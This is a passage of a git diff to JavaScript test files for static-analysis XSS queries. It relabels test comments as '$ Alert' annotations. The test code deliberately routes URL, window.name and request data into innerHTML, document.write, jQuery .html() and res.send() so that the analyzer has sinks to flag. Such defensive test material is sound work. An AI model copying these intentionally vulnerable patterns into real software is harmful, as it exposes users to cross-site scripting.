$('myId').html(prevProps.tainted4) // $ Alert }); } } @@ -256,28 +240,28 @@ function react(){ } function windowName() { - $(window.name); // NOT OK - $(name); // NOT OK + $(window.name); // $ Alert + $(name); // $ Alert } function windowNameAssigned() { for (name of ['a', 'b']) { - $(window.name); // NOT OK - $(name); // OK + $(window.name); // $ Alert + $(name); } } function jqueryLocation() { - $(location); // OK - $(window.location); // OK - $(document.location); // OK + $(location); + $(window.location); + $(document.location); var loc1 = location; var loc2 = window.location; var loc3 = document.location; - $(loc1); // OK - $(loc2); // OK - $(loc3); // OK + $(loc1); + $(loc2); + $(loc3); - $("body").append(location); // NOT OK + $("body").append(location); // $ Alert } @@ -285,7 +269,7 @@ function testCreateContextualFragment() { var tainted = window.name; var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); - var documentFragment = range.createContextualFragment(tainted); // NOT OK + var documentFragment = range.createContextualFragment(tainted); // $ Alert document.body.appendChild(documentFragment); } @@ -293,14 +277,14 @@ function flowThroughPropertyNames() { var obj = {}; obj[Math.random()] = window.name; for (var p in obj) - $(p); // OK + $(p); } function basicExceptions() { try { throw location; } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } try { @@ -308,18 +292,18 @@ function basicExceptions() { throw location } finally {} } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } } function handlebarsSafeString() { - return new Handlebars.SafeString(location); // NOT OK! + return new Handlebars.SafeString(location); // $ Alert } function test2() { var target = document.location.search - // OK + $('myId').html(target.length) } @@ -329,10 +313,10 @@ function getTaintedUrl() { function URLPseudoProperties() { let params = getTaintedUrl().searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert let myUrl = getTaintedUrl(); - $('name').html(myUrl.get('name')); // OK (.get is not defined on a URL) + $('name').html(myUrl.get('name')); // OK - .get is not defined on a URL } @@ -340,27 +324,27 @@ function hash() { function getUrl() { return new URL(document.location); } - $(getUrl().hash.substring(1)); // NOT OK + $(getUrl().hash.substring(1)); // $ Alert } function growl() { var target = document.location.search - $.jGrowl(target); // NOT OK + $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { var target = document.location.search - this.html(target); // NOT OK. (this is a jQuery object) - this.innerHTML = target // OK. (this is a jQuery object) + this.html(target); // $ Alert - this is a jQuery object + this.innerHTML = target // OK - this is a jQuery object this.each(function (i, e) { - this.innerHTML = target; // NOT OK. (this is a DOM-node); - this.html(target); // OK. (this is a DOM-node); + this.innerHTML = target; // $ Alert - (this is a DOM-node); + this.html(target); // OK - (this is a DOM-node); - e.innerHTML = target; // NOT OK. + e.innerHTML = target; // $ Alert }); } $.fn[pluginName] = myPlugin; @@ -370,8 +354,7 @@ function thisNodes() { function test() { var target = document.location.search - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert // OK - but only safe because contents are URI-encoded $('myid').html(document.location.href.split("?")[0]); @@ -381,68 +364,68 @@ function test() { var target = document.location.search - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert - $('myId').html(target.taint); // NOT OK + $('myId').html(target.taint); // $ Alert target.taint2 = 2; - $('myId').html(target.taint2); // OK + $('myId').html(target.taint2); target.taint3 = document.location.search; - $('myId').html(target.taint3); // NOT OK + $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 - $('myId').html(target.sub.taint4); // OK + $('myId').html(target.sub.taint4); - $('myId').html(target.taint5); // NOT OK + $('myId').html(target.taint5); // $ Alert target.taint5 = "safe"; target.taint6 = 2; if (random()) {return;} - $('myId').html(target.taint6); // OK + $('myId').html(target.taint6); if (random()) {target.taint7 = "safe";} - $('myId').html(target.taint7); // NOT OK + $('myId').html(target.taint7); // $ Alert target.taint8 = target.taint8; - $('myId').html(target.taint8); // NOT OK + $('myId').html(target.taint8); // $ Alert target.taint9 = (target.taint9 = "safe"); - $('myId').html(target.taint9); // OK + $('myId').html(target.taint9); } function hash2() { var payload = window.location.hash.substr(1); - document.write(payload); // NOT OK + document.write(payload); // $ Alert let match = window.location.hash.match(/hello (\w+)/); if (match) { - document.write(match[1]); // NOT OK + document.write(match[1]); // $ Alert } - document.write(window.location.hash.split('#')[1]); // NOT OK + document.write(window.location.hash.split('#')[1]); // $ Alert } function nonGlobalSanitizer() { var target = document.location.search - $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // NOT OK + $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert - $("#foo").html(target.replace(/<|>/g, '')); // OK + $("#foo").html(target.replace(/<|>/g, '')); } function mootools(){ var source = document.location.search; - new Element("div"); // OK - new Element("div", {text: source}); // OK - new Element("div", {html: source}); // NOT OK - new Element("div").set("html", source); // NOT OK - new Element("div").set({"html": source}); // NOT OK - new Element("div").setProperty("html", source); // NOT OK - new Element("div").setProperties({"html": source}); // NOT OK - new Element("div").appendHtml(source); // NOT OK + new Element("div"); + new Element("div", {text: source}); + new Element("div", {html: source}); // $ Alert + new Element("div").set("html", source); // $ Alert + new Element("div").set({"html": source}); // $ Alert + new Element("div").setProperty("html", source); // $ Alert + new Element("div").setProperties({"html": source}); // $ Alert + new Element("div").appendHtml(source); // $ Alert } @@ -452,53 +435,53 @@ const ansiToHtml = new Convert(); function ansiToHTML() { var source = document.location.search; - $("#foo").html(source); // NOT OK - $("#foo").html(ansiToHtml.toHtml(source)); // NOT OK + $("#foo").html(source); // $ Alert + $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { var source = document.location.search; let table = document.getElementById('mytable'); - table.innerHTML = source; // NOT OK + table.innerHTML = source; // $ Alert let row = table.insertRow(-1); - row.innerHTML = source; // NOT OK + row.innerHTML = source; // $ Alert let cell = row.insertCell(); - cell.innerHTML = source; // NOT OK + cell.innerHTML = source; // $ Alert } function urlStuff() { var url = document.location.search.substr(1); - $("", {href: url}).appendTo("body"); // NOT OK - $("#foo").attr("href", url); // NOT OK - $("#foo").attr({href: url}); // NOT OK - $("", {src: url}).appendTo("body"); // NOT OK - $("", {href: win.location.href}).appendTo("body"); // OK + $("", {href: url}).appendTo("body"); // $ Alert + $("#foo").attr("href", url); // $ Alert + $("#foo").attr({href: url}); // $ Alert + $("", {src: url}).appendTo("body"); // $ Alert + $("", {href: win.location.href}).appendTo("body"); - $("", {src: "http://google.com/" + url}).appendTo("body"); // OK + $("", {src: "http://google.com/" + url}).appendTo("body"); - $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); // OK + $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); if (url.startsWith("https://")) { - $("", {src: url}).appendTo("body"); // OK + $("", {src: url}).appendTo("body"); } else { - $("", {src: url}).appendTo("body"); // NOT OK + $("", {src: url}).appendTo("body"); // $ Alert } window.open(location.hash.substr(1)); // OK - any JavaScript is executed in another context - navigation.navigate(location.hash.substr(1)); // NOT OK + navigation.navigate(location.hash.substr(1)); // $ Alert const myHistory = require('history').createBrowserHistory(); - myHistory.push(location.hash.substr(1)); // NOT OK + myHistory.push(location.hash.substr(1)); // $ Alert } function Foo() { this.foo = document; var obj = { bar: function() { - this.foo.body.innerHTML = decodeURI(window.location.hash); // NOT OK + this.foo.body.innerHTML = decodeURI(window.location.hash); // $ Alert } }; Object.assign(this, obj); @@ -506,7 +489,7 @@ function Foo() { function nonGlobalSanitizer() { var target = document.location.search - $("#foo").html(target.replace(new RegExp("<|>"), '')); // NOT OK - $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK -- most likely good. We don't know what the flags are. - $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); // OK + $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert + $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. + $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index a6d26e408872..16932da72c05 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js @@ -1,14 +1,14 @@ var foo = document.getElementById("foo"); var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); -foo.setAttribute("src", data.src); // NOT OK -foo.setAttribute("HREF", data.p); // NOT OK -foo.setAttribute("width", data.w); // OK -foo.setAttribute("xlink:href", data.p) // NOT OK - -foo.setAttributeNS('xlink', 'href', data.p); // NOT OK -foo.setAttributeNS('foobar', 'href', data.p); // NOT OK -foo.setAttributeNS('baz', 'width', data.w); // OK +foo.setAttribute("src", data.src); // $ Alert +foo.setAttribute("HREF", data.p); // $ Alert +foo.setAttribute("width", data.w); +foo.setAttribute("xlink:href", data.p) // $ Alert + +foo.setAttributeNS('xlink', 'href', data.p); // $ Alert +foo.setAttributeNS('foobar', 'href', data.p); // $ Alert +foo.setAttributeNS('baz', 'width', data.w); for (var p in data) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index d434ddf20e8e..a1302d196a7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -22,7 +22,7 @@ }, templates: { suggestion: function(val) { - return val; // NOT OK + return val; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index f35e603228d6..957fe1ba0497 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,15 +1,15 @@ function test() { let tainted = document.location.search; - $("
" + tainted + "
"); // NOT OK - $(`
${tainted}
`); // NOT OK - $("
".concat(tainted).concat("
")); // NOT OK - $(["
", tainted, "
"].join()); // NOT OK + $("
" + tainted + "
"); // $ Alert + $(`
${tainted}
`); // $ Alert + $("
".concat(tainted).concat("
")); // $ Alert + $(["
", tainted, "
"].join()); // $ Alert - $("
"); // NOT OK - $(`
`); // NOT OK - $("
")); // NOT OK - $(["
"].join()); // NOT OK + $("
"); // $ Alert + $(`
`); // $ Alert + $("
")); // $ Alert + $(["
"].join()); // $ Alert function indirection1(attrs) { return '
' + content + '
'; @@ -17,6 +17,6 @@ function test() { function indirection2(attrs) { return '
'.concat(content)).concat('
'); } - $(indirection1(document.location.search.attrs)); // NOT OK - $(indirection2(document.location.search.attrs)); // NOT OK + $(indirection1(document.location.search.attrs)); // $ Alert + $(indirection2(document.location.search.attrs)); // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js index 36dd5181a1b5..43c6618430e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js @@ -8,7 +8,7 @@ ajv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollDat app.post('/polldata', (req, res) => { if (!ajv.validate('pollData', req.body)) { - res.send(ajv.errorsText()); // NOT OK + res.send(ajv.errorsText()); // $ Alert } }); @@ -21,6 +21,6 @@ const joiSchema = joi.object().keys({ app.post('/votedata', (req, res) => { const val = joiSchema.validate(req.body); if (val.error) { - res.send(val.error); // NOT OK + res.send(val.error); // $ Alert } }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index 150b9e204fda..f8a3d5c09486 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js @@ -8,31 +8,31 @@ try { unknown(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { inner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown(foo + "bar"); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown({ prop: foo }); } catch (e) { - $('myId').html(e); // NOT OK! - but not detected due to not tainting object that have a tainted propety. [INCONSISTENCY] + $('myId').html(e); // $ MISSING: Alert - - but not detected due to not tainting object that have a tainted propety. } try { unknown(["bar", foo]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } function deep(x) { @@ -45,13 +45,13 @@ try { deep("bar" + foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { var tmp = "bar" + foo; } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function safe(x) { @@ -61,13 +61,13 @@ try { safe(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { safe.call(null, foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } var myWeirdInner; try { @@ -75,12 +75,12 @@ inner(x); } } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { myWeirdInner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } $('myId').html(foo); // Direct leak, reported by other query. @@ -88,13 +88,13 @@ try { unknown(foo.match(/foo/)); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown([foo, "bar"]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { @@ -104,7 +104,7 @@ // nothing } } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } }); @@ -116,7 +116,7 @@ app.get('/user/:id', function (req, res) { try { unknown(req.params.id); } catch (e) { - res.send("Exception: " + e); // NOT OK! + res.send("Exception: " + e); // $ Alert } }); @@ -127,7 +127,7 @@ app.get('/user/:id', function (req, res) { try { unknown(sessionStorage.getItem('exceptionSession')); } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } })(); @@ -135,10 +135,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { unknown(req.params.id, (error, res) => { if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert return; } - $('myId').html(res); // OK (for now?) + $('myId').html(res); // OK - for now? }); }); @@ -146,25 +146,25 @@ app.get('/user/:id', function (req, res) { var foo = document.location.search; new Promise(resolve => unknown(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); try { null[foo]; } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } try { unknown()[foo]; } catch (e) { - $('myId').html(e); // OK. We are not sure that `unknown()` is null-ish. + $('myId').html(e); // OK - We are not sure that `unknown()` is null-ish. } try { "foo"[foo] } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function inner(tainted, resolve) { @@ -172,16 +172,16 @@ app.get('/user/:id', function (req, res) { } new Promise(resolve => inner(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); })(); app.get('/user/:id', function (req, res) { unknown(req.params.id, (error, res) => { if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert } - $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. + $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. }); }); @@ -189,7 +189,7 @@ app.get('/user/:id', function (req, res) { try { res.send(req.params.id); } catch(err) { - res.send(err); // OK (the above `res.send()` is already reported by js/xss) + res.send(err); // OK - (the above `res.send()` is already reported by js/xss) } }); @@ -210,7 +210,7 @@ var fs = require("fs"); log.info(foo); localStorage.setItem(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index c3b1cbc2da8a..ef82f644a049 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -4,8 +4,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // BAD: a request parameter is incorporated without validation into the response - res.send("Unknown user: " + req.params.id); + res.send("Unknown user: " + req.params.id); // $ Alert - a request parameter is incorporated without validation into the response moreBadStuff(req.params, res); } else { // TODO: do something exciting @@ -14,32 +13,32 @@ app.get('/user/:id', function(req, res) { }); function moreBadStuff(params, res) { - res.send("Unknown user: " + params.id); // NOT OK + res.send("Unknown user: " + params.id); // $ Alert } var marked = require("marked"); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(marked(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(marked(req.body)); // $ Alert }); var table = require('markdown-table') app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert var mytable = table([ ['Name', 'Content'], ['body', req.body] ]); - res.send(mytable); // NOT OK - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps + res.send(mytable); // $ Alert - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps }); var showdown = require('showdown'); var converter = new showdown.Converter(); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(converter.makeHtml(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(converter.makeHtml(req.body)); // $ Alert }); var unified = require('unified'); @@ -53,7 +52,7 @@ var sanitize = require("rehype-sanitize"); const { resetExtensions } = require('showdown'); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert unified() .use(markdown) @@ -62,17 +61,17 @@ app.get('/user/:id', function (req, res) { .use(format) .use(html) .process(req.body, function (err, file) { - res.send(file); // NOT OK + res.send(file); // $ Alert }); - res.send(remark().processSync(req.body).toString()); // NOT OK + res.send(remark().processSync(req.body).toString()); // $ Alert - res.send(remark().use(sanitize).processSync(req.body).toString()); // OK + res.send(remark().use(sanitize).processSync(req.body).toString()); - res.send(unified().use(markdown).processSync(req.body).toString); // NOT OK + res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert remark().process(req.body, (e, f) => { - res.send(f); // NOT OK + res.send(f); // $ Alert }) }); @@ -80,9 +79,9 @@ import snarkdown from 'snarkdown'; var snarkdown2 = require("snarkdown"); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(snarkdown(req.body)); // NOT OK - res.send(snarkdown2(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(snarkdown(req.body)); // $ Alert + res.send(snarkdown2(req.body)); // $ Alert }); const markdownIt = require('markdown-it')({ @@ -94,20 +93,20 @@ const markdownIt3 = require('markdown-it')({html: true}) .use(require('markdown-it-highlightjs')); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(markdownIt.render(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(markdownIt.render(req.body)); // $ Alert res.send(markdownIt2.render(req.body)); // OK - no html - res.send(markdownIt3.render(req.body)); // NOT OK + res.send(markdownIt3.render(req.body)); // $ Alert - res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. - res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // NOT OK + res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. + res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // $ Alert }); var Hapi = require('hapi'); var hapi = new Hapi.Server(); hapi.route({ handler: function (request){ - return request.query.p; // NOT OK + return request.query.p; // $ Alert }}); app.get("invalid/keys/:id", async (req, res) => { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js index 64acfded0a63..cf89f45b9692 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js @@ -7,7 +7,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is plain text } else { res.set('Content-Type', 'text/html'); - res.send("FOO: " + req.params.id); // NOT OK - content type is HTML. + res.send("FOO: " + req.params.id); // $ Alert - content type is HTML. } }); @@ -17,7 +17,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is JSON } else { res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. } }); @@ -36,10 +36,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { if (err) { res.statusCode = 404; - res.end("FOO: " + req.params.id); // NOT OK + res.end("FOO: " + req.params.id); // $ Alert } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -50,10 +50,10 @@ function textContentType() { app.get('/user/:id', function (req, res) { if (err) { res.header({'Content-Type': textContentType()}); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -67,13 +67,13 @@ app.get('/user/:id', function (req, res) { somethingMore(); while(Math.random()) {}; res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. }); app.get('/user/:id', function (req, res) { res.header({'Content-Type': textContentType()}); myFancyFunction(() => { - res.send("FOO: " + req.params.id); // OK + res.send("FOO: " + req.params.id); }); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js index c6635459f42f..a92226bff122 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js @@ -5,7 +5,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: request parameter is sanitized before incorporating it into the response + // OK - request parameter is sanitized before incorporating it into the response res.send("Unknown user: " + escape(req.params.id)); else // TODO: do something exciting @@ -15,13 +15,13 @@ app.get('/user/:id', function(req, res) { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: templating prevents XSS + // OK - templating prevents XSS res.render(invalidUserIdTemplate, { id: req.params.id }); }); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', 'text/plain'); res.send("Unknown user: " + req.params.id); } else @@ -35,7 +35,7 @@ function textContentType() { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', textContentType()); res.send("Unknown user: " + req.params.id); } else @@ -53,7 +53,7 @@ app.get('/echo', function(req, res) { app.get('/user/:id', function(req, res) { const url = req.params.id; if (!/["'&<>]/.exec(url)) { - res.send(url); // OK + res.send(url); } }); @@ -66,7 +66,7 @@ function escapeHtml1 (str) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK + res.send(escapeHtml1(url)); }); const matchHtmlRegExp = /["'&<>]/; @@ -82,6 +82,6 @@ function escapeHtml2 (string) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml2(url)); // OK + res.send(escapeHtml2(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 2217ab783ac7..5ab9f9d6f265 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js @@ -134,9 +134,9 @@ function escapeHtml4(s) { app.get('/user/:id', function (req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK - res.send(escapeHtml2(url)); // OK - res.send(escapeHtml3(url)); // OK - but FP [INCONSISTENCY] - res.send(escapeHtml4(url)); // OK + res.send(escapeHtml1(url)); + res.send(escapeHtml2(url)); + res.send(escapeHtml3(url)); // $ SPURIOUS: Alert - FP + res.send(escapeHtml4(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js index c30ab48a511d..3fba93d3b4a7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js @@ -5,6 +5,6 @@ var app = express(); app.use(cookieParser()); app.get('/cookie/:name', function(req, res) { - // OK + res.send("Here, have a cookie: " + req.cookies[req.params.name]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 45ad3a94920c..448f12270783 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js @@ -2,7 +2,7 @@ var express = require('express'); express().get('/user/', function(req, res) { var evil = req.query.evil; - res.send(console.log("
%s
", evil)); // OK (returns undefined) - res.send(util.format("
%s
", evil)); // NOT OK - res.send(require("printf")("
%s
", evil)); // NOT OK + res.send(console.log("
%s
", evil)); // OK - returns undefined + res.send(util.format("
%s
", evil)); // $ Alert + res.send(require("printf")("
%s
", evil)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index aed560fc0767..cd6ca0c9e3da 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -3,13 +3,13 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { const tainted = req.url; - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { const tainted = req.url; - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }); var params = { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 4b2edd4e4faf..105080e5fba2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -7,7 +7,7 @@ let app = express(); app.get("/some/path", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = sendResponse.bind(null, req.url); @@ -16,7 +16,7 @@ app.get("/some/path", (req, res) => { app.get("/underscore", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = underscore.partial(sendResponse, req.url); @@ -25,7 +25,7 @@ app.get("/underscore", (req, res) => { app.get("/lodash", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = lodash.partial(sendResponse, req.url); @@ -34,7 +34,7 @@ app.get("/lodash", (req, res) => { app.get("/ramda", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = R.partial(sendResponse, [req.url]); @@ -49,7 +49,7 @@ app.get("/return", (req, res) => { let callback = getFirst.bind(null, req.url); res.send(callback); // OK - the callback itself is not tainted - res.send(callback()); // NOT OK - but not currently detected [INCONSISTENCY] + res.send(callback()); // $ MISSING: Alert - not currently detected res.send(getFirst("Hello")); // OK - argument is not tainted from this call site }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index d48ec23af5f1..392a1f7ec612 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -3,9 +3,9 @@ let app = express(); app.get("/some/path", (req, res) => { new Promise((resolve, reject) => resolve(req.query.data)) - .then(x => res.send(x)); // NOT OK + .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) .then(x => escapeHtml(x)) - .then(x => res.send(x)); // OK + .then(x => res.send(x)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 60399a9b63d6..35021ea39120 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js @@ -4,8 +4,8 @@ var app = express(); app.get('/user/:id', function(req, res) { let { p, q: r } = req.params; - 